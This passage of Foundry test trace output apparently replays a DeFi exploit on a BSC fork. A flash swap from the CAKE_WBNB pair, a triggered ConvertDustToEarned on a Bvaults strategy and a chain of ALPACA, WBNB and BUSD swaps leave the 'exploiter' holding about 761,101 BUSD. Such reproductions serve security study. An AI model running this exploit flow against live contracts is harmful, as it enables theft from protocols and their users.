    │   │   │   │   │   │   @ 8: 0x656f9bbc0000000002281716c2e025017d200000000000dcc861650500c25c34 → 0x656f9bbc000000000277dfe579561ce6334a0000000000c0f43dad1514caf3b2
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [797] ALPACA::balanceOf(BvaultsStrategy: [0x21125d94Cfe886e7179c8D2fE8c1EA8D57C73E0e]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 513348353791467415682 [5.133e20]
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit ConvertDustToEarned(: BUSD: [0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56], : ALPACA: [0x8F0528cE5eF7B51152A59745bEfDD91D97091d2F], : 768358953227757555088466 [7.683e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xf10447237ecc206997c8e196fc689d4ab47b02e228fb6a726c59db2f468ddaf4: 0 → 0x00000000000000000000000000000000000000000000a2b4d2835c704cf4fc52
    │   │   │   └─ ← [Stop]
    │   │   ├─ [797] ALPACA::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 220581498250452103236696 [2.205e23]
    │   │   ├─ [52999] Router::swapExactTokensForTokensSupportingFeeOnTransferTokens(220581498250452103236696 [2.205e23], 0, [0x8F0528cE5eF7B51152A59745bEfDD91D97091d2F, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1701813180 [1.701e9])
    │   │   │   ├─ [6107] ALPACA::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xF3CE6Aac24980E6B657926dfC79502Ae414d3083, 220581498250452103236696 [2.205e23])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xF3CE6Aac24980E6B657926dfC79502Ae414d3083, value: 220581498250452103236696 [2.205e23])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Router: [0x05fF2B0DB69458A0750badebc4f9e13aDd608C7F], value: 115792089237316195423570985008687907853269984665640563818876085757461026403239 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x814fe2fe38ac15255003b27cb20583bb0f9ed8e852e552e2eede51991a545127: 0x0000000000000000000000000000000000000000000000c0f43dad1514caf3b2 → 0x000000000000000000000000000000000000000000002f76b377cd00c309800a
    │   │   │   │   │   @ 0x239c5bca1dc92bde21fdc9e084b86c229b01ef244095d92687dcc171a40c255f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffd14a40c5e01451c173a7
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000002eb5bf3a1febae3e8c58 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [494] 0xF3CE6Aac24980E6B657926dfC79502Ae414d3083::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 3559374275377122440114 [3.559e21], 11656028945161610736458 [1.165e22], 1701813180 [1.701e9]
    │   │   │   ├─ [797] ALPACA::balanceOf(0xF3CE6Aac24980E6B657926dfC79502Ae414d3083) [staticcall]
    │   │   │   │   └─ ← [Return] 224140872525829225676810 [2.241e23]
    │   │   │   ├─ [36902] 0xF3CE6Aac24980E6B657926dfC79502Ae414d3083::swap(0, 11470565273046202670387 [1.147e22], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [23162] WBNB::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 11470565273046202670387 [1.147e22])
    │   │   │   │   │   ├─ emit Transfer(from: 0xF3CE6Aac24980E6B657926dfC79502Ae414d3083, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 11470565273046202670387 [1.147e22])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb50cc8215a1f75f3f96d8db27d864bc4a04454f3b4a7d8c8e269534729037283: 0x000000000000000000000000000000000000000000000277dfe579561ce6334a → 0x00000000000000000000000000000000000000000000000a0dd353290a6ad617
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000026dd212262d127b5d33
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [797] ALPACA::balanceOf(0xF3CE6Aac24980E6B657926dfC79502Ae414d3083) [staticcall]
    │   │   │   │   │   └─ ← [Return] 224140872525829225676810 [2.241e23]
    │   │   │   │   ├─ [534] WBNB::balanceOf(0xF3CE6Aac24980E6B657926dfC79502Ae414d3083) [staticcall]
    │   │   │   │   │   └─ ← [Return] 185463672115408066071 [1.854e20]
    │   │   │   │   ├─ emit Sync(reserve0: 224140872525829225676810 [2.241e23], reserve1: 185463672115408066071 [1.854e20])
    │   │   │   │   ├─ emit Swap(sender: Router: [0x05fF2B0DB69458A0750badebc4f9e13aDd608C7F], amount0In: 220581498250452103236696 [2.205e23], amount1In: 0, amount0Out: 0, amount1Out: 11470565273046202670387 [1.147e22], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x656f9bbc000000000277dfe579561ce6334a0000000000c0f43dad1514caf3b2 → 0x656f9bbc00000000000a0dd353290a6ad617000000002f76b377cd00c309800a
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 11470565273046202670387 [1.147e22]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [0] VM::load(0xe1997bC971D5986AA57Ee8ffB57eb1DeBa4fDAaa, 0x0000000000000000000000000000000000000000000000000000000000000006) [staticcall]
    │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   │   ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 11470565273046202670387 [1.147e22]
    │   │   ├─ [49791] Router::swapExactTokensForTokensSupportingFeeOnTransferTokens(1446502616404598650387 [1.446e21], 0, [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1701813180 [1.701e9])
    │   │   │   ├─ [3425] WBNB::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x1B96B92314C44b159149f7E0303511fB2Fc4774f, 1446502616404598650387 [1.446e21])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x1B96B92314C44b159149f7E0303511fB2Fc4774f, value: 1446502616404598650387 [1.446e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000026dd212262d127b5d33 → 0x00000000000000000000000000000000000000000000021f67d0847495406720
    │   │   │   │   │   @ 0x1706dae16412950c0171f9482883b4cf3cb1385468d3a4a4c0fdeceb42541dba: 0x00000000000000000000000000000000000000000000003f7b27d646dbda4b66 → 0x00000000000000000000000000000000000000000000008de56977ff59154179
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [494] 0x1B96B92314C44b159149f7E0303511fB2Fc4774f::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 1171019173834283174758 [1.171e21], 1378486979711992711127595 [1.378e24], 1701813180 [1.701e9]
    │   │   │   ├─ [534] WBNB::balanceOf(0x1B96B92314C44b159149f7E0303511fB2Fc4774f) [staticcall]
    │   │   │   │   └─ ← [Return] 2617521790238881825145 [2.617e21]
    │   │   │   ├─ [36645] 0x1B96B92314C44b159149f7E0303511fB2Fc4774f::swap(0, 761101179715950511062981 [7.611e23], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [23171] BUSD::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 761101179715950511062981 [7.611e23])
    │   │   │   │   │   ├─ emit Transfer(from: 0x1B96B92314C44b159149f7E0303511fB2Fc4774f, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 761101179715950511062981 [7.611e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000a12b60ac20c842c2ffc5
    │   │   │   │   │   │   @ 0x8ee87189e2baecbd44653ddbc4ee9990ab05c6b0175205014f8acd3e7f74ee56: 0x0000000000000000000000000000000000000000000123e7edccdf05fcd4a22b → 0x0000000000000000000000000000000000000000000082bc8d20be3dba11a266
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [534] WBNB::balanceOf(0x1B96B92314C44b159149f7E0303511fB2Fc4774f) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2617521790238881825145 [2.617e21]
    │   │   │   │   ├─ [531] BUSD::balanceOf(0x1B96B92314C44b159149f7E0303511fB2Fc4774f) [staticcall]
    │   │   │   │   │   └─ ← [Return] 617385799996042200064614 [6.173e23]
    │   │   │   │   ├─ emit Sync(reserve0: 2617521790238881825145 [2.617e21], reserve1: 617385799996042200064614 [6.173e23])
    │   │   │   │   ├─ emit Swap(sender: Router: [0x05fF2B0DB69458A0750badebc4f9e13aDd608C7F], amount0In: 1446502616404598650387 [1.446e21], amount1In: 0, amount0Out: 0, amount1Out: 761101179715950511062981 [7.611e23], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x656f9bbc0000000123e7edccdf05fcd4a22b00000000003f7b27d646dbda4b66 → 0x656f9bbc0000000082bc8d20be3dba11a26600000000008de56977ff59154179
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 761101179715950511062981 [7.611e23]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 10024062656641604020000 [1.002e22]
    │   │   ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 10024062656641604020000 [1.002e22]
    │   │   ├─ [0] VM::load(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000021f67d0847495406720
    │   │   ├─ [0] VM::store(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0x00000000000000000000000000000000000000000000021f75b13b283ca46720)
    │   │   │   └─ ← [Return]
    │   │   ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 10025062656641604020000 [1.002e22]
    │   │   ├─ [0] VM::load(0xe1997bC971D5986AA57Ee8ffB57eb1DeBa4fDAaa, 0x0000000000000000000000000000000000000000000000000000000000000006) [staticcall]
    │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   │   ├─ [3262] WBNB::transfer(CAKE_WBNB: [0x0eD7e52944161450477ee417DE9Cd3a859b14fD0], 10025062656641604020000 [1.002e22])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: CAKE_WBNB: [0x0eD7e52944161450477ee417DE9Cd3a859b14fD0], value: 10025062656641604020000 [1.002e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000021f75b13b283ca46720 → 0
    │   │   │   │   @ 0x774456c48aa6871068b68c947f132b492bb302d48e494377f521bc0164db1c16: 0x00000000000000000000000000000000000000000000114db86be474bd23d976 → 0x00000000000000000000000000000000000000000000136d2e1d1f9cf9c84096
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000021f67d0847495406720 → 0x00000000000000000000000000000000000000000000021f75b13b283ca46720
    │   │   └─ ← [Stop]
    │   ├─ [2531] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::balanceOf(CAKE_WBNB: [0x0eD7e52944161450477ee417DE9Cd3a859b14fD0]) [staticcall]
    │   │   └─ ← [Return] 8309650940538668565615693 [8.309e24]
    │   ├─ [534] WBNB::balanceOf(CAKE_WBNB: [0x0eD7e52944161450477ee417DE9Cd3a859b14fD0]) [staticcall]
    │   │   └─ ← [Return] 91738981125416735490198 [9.173e22]
    │   ├─ emit Sync(reserve0: 8309650940538668565615693 [8.309e24], reserve1: 91738981125416735490198 [9.173e22])
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 0, amount1In: 10025062656641604020000 [1.002e22], amount0Out: 0, amount1Out: 10000000000000000000000 [1e22], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 8: 0x656f9ba400000000136bd24cae2f6f63d97600000006dfa3148282595867544d → 0x656f9bbc00000000136d2e1d1f9cf9c8409600000006dfa3148282595867544d
    │   │   @ 10: 0x0000000000000000000000000001818853a3f0c03feef972880afc1bf67ed974 → 0x000000000000000000000000000181885c226feec857119d248543a29516c64c
    │   │   @ 9: 0x00000000000000000000000000000019ffc3b583c899ebc059b8eb4e4168f1ba → 0x00000000000000000000000000000019ffc3f9538a6154005fdafe2a1282b492
    │   └─ ← [Stop]
    ├─ [531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 761101179715950511062981 [7.611e23]
    ├─ [425] BUSD::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Exploiter amount of BUSD after attack", val: 761101179715950511062981 [7.611e23], decimals: 18)
    ├─  storage changes:
    │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 0x396a7d57b1aea314023640b7ed728f666287564bb314d80a207216816c01c6de: 0 → 1
    │   @ 0x396a7d57b1aea314023640b7ed728f666287564bb314d80a207216816c01c6db: 0 → 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c
    │   @ 0xe0eba829a1ca25faf244a5bd1aca80e35c2f62a4aefd737dac41a0ab6a2cbd49: 0 → 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96
    │   @ 0xe0eba829a1ca25faf244a5bd1aca80e35c2f62a4aefd737dac41a0ab6a2cbd4c: 0 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 13.33s (12.13s CPU time)

Ran 2 test suites in 14.32s (13.85s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
